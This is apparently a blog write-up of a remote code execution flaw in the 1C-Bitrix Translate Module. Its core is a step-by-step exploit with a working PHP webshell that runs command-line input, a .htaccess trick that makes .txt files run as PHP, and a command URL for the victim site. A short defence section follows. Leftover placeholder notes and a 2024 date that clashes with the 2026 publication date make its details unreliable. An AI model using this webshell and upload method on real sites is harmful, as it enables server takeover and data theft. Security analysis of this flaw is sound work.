CVE-2025-67887 - Exploiting Remote Code Execution in 1C-Bitrix Translate Module (Simple & Exclusive Analysis)

TL;DR: If you’re running 1C-Bitrix (up to version 25.100.500), be aware: Anyone with SOURCE/WRITE permissions on the Translate Module can upload a PHP file and a tailored .htaccess to run unauthorized code. While 1C-Bitrix claims “power users are supposed to have this” — we disagree. Here’s how an attacker could abuse this “feature.”

What’s Happening — Simple Version

1C-Bitrix is a popular CMS in Russia and Eastern Europe. The Translate Module lets users help translate or localize web content.

With high enough permissions (SOURCE/WRITE), a user is meant to add new language files. But that means they can upload *any* file — not just safe ones. This is where CVE-2025-67887 comes in: By uploading a malicious PHP file (and a smart .htaccess), an attacker can turn translation into total takeover.

> Reference: NVD entry for CVE-2025-67887 (Note: Replace with actual when published. None as of June 2024.)

Step-By-Step Exploit Breakdown

Let’s see how this works in reality, with fresh, easy-to-follow snippets.

1. Get the Right Permissions

First, the attacker needs SOURCE/WRITE permissions on the Translate Module. Often, this could be a translator role — not always a full admin.

2. Craft a PHP Webshell

Any simple PHP shell will do. Here’s one that echoes back command output — a time-proven favorite:

<?php
if(isset($_GET["cmd"])) {
    system($_GET["cmd"]);
}
?>

3. Prepare a .htaccess File

Some servers don’t parse .php files (for example, if you’re supposed to upload only .txt or .xml). To make sure your upload is treated as PHP, add a .htaccess with:

AddType application/x-httpd-php .txt .php

4. Upload Files via Translate Module

Using the UI (or the API), upload both shell.php and the .htaccess file into the language/ folder (or wherever the module stores translation files).

Visit

https://victim-site.com/bitrix/modules/translate/language/shell.php?cmd=whoami

Or whatever the real path is. Replace whoami with any command.

Why This is a REAL Problem

- Privilege Escalation: Sometimes a site might delegate translation to users who shouldn’t be able to execute code.

Supplier’s Response (And Why It’s Not Enough)

Bitrix recognizes that “translators” with SOURCE/WRITE are powerful. Their claim: “Uploading PHP files is intended for high-privileged users.”

But:

There’s no warning about RCE risk in docs or interface.

- Defense in depth is missing — even privileged user actions should be restricted from RCE by accident or intent.

How to Defend

- Strict Permissions: Only give Translate Module SOURCE/WRITE to top admins you absolutely trust.

Segregate Translation: Use external tools, and import only verified files.

- WAF/ModSecurity: Block suspicious .php URLs in this directory if possible.

Real-World Implications

This bug lets any *trusted* but perhaps careless, compromised, or disgruntled translator potentially get root-on-the-webserver. Even if this is “meant to be” for admins, history shows such paths often lead to big problems.

More Info & References

- 1C-Bitrix Translate Module Docs
- Example PHP Webshells
- OWASP File Upload Cheat Sheet

Mitre entry on CVE-2025-67887: (link to be added when available)

Summary

CVE-2025-67887 in 1C-Bitrix is a potent RCE flaw hiding in plain sight. The “feature” is really a misfeature if you ever hand out Translate Module write access to anyone less than fully trusted — *which happens*. Don’t get caught by surprise: audit your users, restrict uploads, and consider alternate translation infrastructure.

Timeline

Published on: 05/08/2026 00:00:00 UTC
Last modified on: 05/08/2026 07:16:28 UTC